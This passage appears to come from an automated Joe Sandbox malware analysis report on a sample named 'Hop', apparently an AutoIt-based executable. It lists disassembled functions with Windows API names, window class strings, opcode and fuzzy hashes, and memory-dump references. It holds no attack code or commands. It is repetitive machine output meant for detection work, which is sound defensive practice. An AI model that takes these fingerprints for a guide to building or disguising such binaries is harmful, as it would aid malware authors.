                                                                                                                                                                                                                                                                                                          • API String ID: 1986988660-2515660138
                                                                                                                                                                                                                                                                                                          • Opcode ID: 8b9a672c5679c7d79af7300a008647115a44a4ad4b9a8e2cd430e2f10d72906a
                                                                                                                                                                                                                                                                                                          • Instruction ID: 40a764a39e1d52bedcae5fc2987eed4dbef71ea1480b91c6f656cd7983a37013
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b9a672c5679c7d79af7300a008647115a44a4ad4b9a8e2cd430e2f10d72906a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8C1CF71D1AB42C5EA40DB14B8A14B5BBE8FFE8354F54023ED48D92E61DF7CA1A1C782
                                                                                                                                                                                                                                                                                                          Function 00007FF68C45B078 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 150COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                          • String ID: $*
                                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-3982473090
                                                                                                                                                                                                                                                                                                          • Opcode ID: f489a03a3506d653c7ee3588779f7f95d69400e15805bf1bd0434c8f497717d8
                                                                                                                                                                                                                                                                                                          • Instruction ID: c5acb1f2bfc89b16017ea5a35541fd95ff17e241e440aa7ab7eff0088df6f9d8
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f489a03a3506d653c7ee3588779f7f95d69400e15805bf1bd0434c8f497717d8
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1661407290C642CAE7A88E34805937C3BA0FF05B5DF14123DEA5AC7299CF29E4C9C725
                                                                                                                                                                                                                                                                                                          Function 00007FF68C465EF8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _set_statfp
                                                                                                                                                                                                                                                                                                          • String ID: !$acos
                                                                                                                                                                                                                                                                                                          • API String ID: 1156100317-2870037509
                                                                                                                                                                                                                                                                                                          • Opcode ID: fe5c41fd610f88853482abc0cd2e8e1d01d6fbece9f8f84a67c424940e19f963
                                                                                                                                                                                                                                                                                                          • Instruction ID: 38986b133045ecb17b7f32e20283ad92f447a4e56201f9f7fd3233fe772f1071
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe5c41fd610f88853482abc0cd2e8e1d01d6fbece9f8f84a67c424940e19f963
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A614221D28F45C9E623CB3858516769754BF963D8F11833AEA5EB6A64DF2CA0C2C700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4661B8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _set_statfp
                                                                                                                                                                                                                                                                                                          • String ID: !$asin
                                                                                                                                                                                                                                                                                                          • API String ID: 1156100317-2188059690
                                                                                                                                                                                                                                                                                                          • Opcode ID: 41486beb716a1d3ce37726eba78a07ae1a3876e53f623111aae521f8a9e85d9d
                                                                                                                                                                                                                                                                                                          • Instruction ID: 8900208f441990c246db0411d5b4b019736cfcdadbb76645db659fae02a3850e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41486beb716a1d3ce37726eba78a07ae1a3876e53f623111aae521f8a9e85d9d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E619921D28F85C5E653CB7858113B69754BF963D8F11833AEA5EB7A69DF2CA0C2C700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4AAD28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                                                                                                          • String ID: P
                                                                                                                                                                                                                                                                                                          • API String ID: 135850232-3110715001
                                                                                                                                                                                                                                                                                                          • Opcode ID: f62664e60d2089e058bbf88f82fa64fb9d6e9027cc1cc1a0f268c82638e958f5
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3755bdab369e2f61871801733481fd94b2c03d08c3ca2db828f4eafd4b4bedd4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f62664e60d2089e058bbf88f82fa64fb9d6e9027cc1cc1a0f268c82638e958f5
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C41AF22B04681C6E760DF1584043AE77A1FFC4BA8F5A8239EA6D973C1DF79D485CB00
                                                                                                                                                                                                                                                                                                          Function 00007FF68C46E938 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                                                                                                                                                                          • String ID: U
                                                                                                                                                                                                                                                                                                          • API String ID: 2456169464-4171548499
                                                                                                                                                                                                                                                                                                          • Opcode ID: f09a28fcae5188001d86cef28677a7ab9bc0fda8486cb330b6ca1d514bdcb2ce
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7d33c79795041bb884430b4fdd0c11aaa9ff67cd74de28e296e411d73451c9f6
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f09a28fcae5188001d86cef28677a7ab9bc0fda8486cb330b6ca1d514bdcb2ce
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C41B162A18A45C2EB60CF25E4447AA77A1FF88B98F414035EE8EC7798DF7CD485C740
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4DBCCC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$Long
                                                                                                                                                                                                                                                                                                          • String ID: SysTreeView32
                                                                                                                                                                                                                                                                                                          • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                                                                          • Opcode ID: 7bb5fa9822eba039514a9ba19c73050aeebd4584b22656b65eef0b423cabdd65
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7b452d79645368aaea87003b3ed4b5e784ea90c3cd510d88b6028b2f0f4fe1b6
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7bb5fa9822eba039514a9ba19c73050aeebd4584b22656b65eef0b423cabdd65
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB412A32A097D2C6E770DB24E444B9A77A1FB84768F144339DAA847B99CF3CD895CB40
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4DB410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$Window$CreateObjectStock
                                                                                                                                                                                                                                                                                                          • String ID: SysMonthCal32
                                                                                                                                                                                                                                                                                                          • API String ID: 2671490118-1439706946
                                                                                                                                                                                                                                                                                                          • Opcode ID: 25626af29ff67ce8d6fd7c70d4133758a87d5dadaddcd57ce23f9999b42ad6ab
                                                                                                                                                                                                                                                                                                          • Instruction ID: fd52207d990bb73c1f4e389005e5e2813571049ac73ca5edc4c7d5236d620f1b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25626af29ff67ce8d6fd7c70d4133758a87d5dadaddcd57ce23f9999b42ad6ab
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC4160326086C1CAE770DF15E444B5AB7A1FB887A4F504239EA9943B99DF3CD485CF40
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4DC010 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$Window$CreateDestroyObjectStock
                                                                                                                                                                                                                                                                                                          • String ID: msctls_updown32
                                                                                                                                                                                                                                                                                                          • API String ID: 1752125012-2298589950
                                                                                                                                                                                                                                                                                                          • Opcode ID: 428f94a7a59cd7bf989baa6ef0aa5c6b519b04ddf6fb8b4790f89f2c0ee1e6c4
                                                                                                                                                                                                                                                                                                          • Instruction ID: f2f0f2084a4e3399b5be66c3656a7d7f2d9afb2b76da0a991c3c15b5bb5751d5
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 428f94a7a59cd7bf989baa6ef0aa5c6b519b04ddf6fb8b4790f89f2c0ee1e6c4
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46317072A18B81C6EB20CF15E4907A973A1FBC5B95F108139DA8D83B99CF3CD485CB00
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4DAA64 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$Window$CreateMoveObjectStock
                                                                                                                                                                                                                                                                                                          • String ID: Listbox
                                                                                                                                                                                                                                                                                                          • API String ID: 3747482310-2633736733
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2d3583662e6f7e144ee14d910da68979ea0603b7228fe14a50fd2d5f2b3179cb
                                                                                                                                                                                                                                                                                                          • Instruction ID: d9630b73188c9ff26fd81ddbc0ed3aac571660df36dc48ed4c2481079800ad36
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d3583662e6f7e144ee14d910da68979ea0603b7228fe14a50fd2d5f2b3179cb
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 553139366187C1CAE770DF15B444A5AB7A1FB887A4F508229EAA943B99CF7DD481CF00
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4346E4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetOpenFileNameW.COMDLG32 ref: 00007FF68C47B0D8
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C435A50: GetFullPathNameW.KERNEL32(?,00007FF68C435A3D,?,00007FF68C434C50,?,?,?,00007FF68C43109E), ref: 00007FF68C435A7B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C434694: GetLongPathNameW.KERNEL32(?,00007FF68C434741,?,00007FF68C433C00,?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C4346B8
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                                                                                          • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
                                                                                                                                                                                                                                                                                                          • API String ID: 779396738-2360590182
                                                                                                                                                                                                                                                                                                          • Opcode ID: 16a998d4ffd8908b2b5846d7a7af52c857f6656f6899eb4e8e8eaa093dec734f
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7681a09142ee1739a91e1ecabf3ce69e976bec70496e7411131e6bf3d64160b8
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 16a998d4ffd8908b2b5846d7a7af52c857f6656f6899eb4e8e8eaa093dec734f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F312C72A08B82C9E710DF21E8445AD77A4FF89B88F584139DA8C87B59DF7CD595CB00
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4DB97C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                                                                                          • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                                                                          • API String ID: 1025951953-1010561917
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0ec90dd8264e47930b8add246dd2117d3f761b03aba2c3bb1ed4f7e4c6c127fa
                                                                                                                                                                                                                                                                                                          • Instruction ID: 1069b411177ca99421055d3ee571424b2bdc403b0c0777eb68167976566935ec
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ec90dd8264e47930b8add246dd2117d3f761b03aba2c3bb1ed4f7e4c6c127fa
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC311876A18681CBE760CF25E454B5AB7A1FB88B94F144239EB9883B55CF3CD885CF04
                                                                                                                                                                                                                                                                                                          Function 00007FF68C458612 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
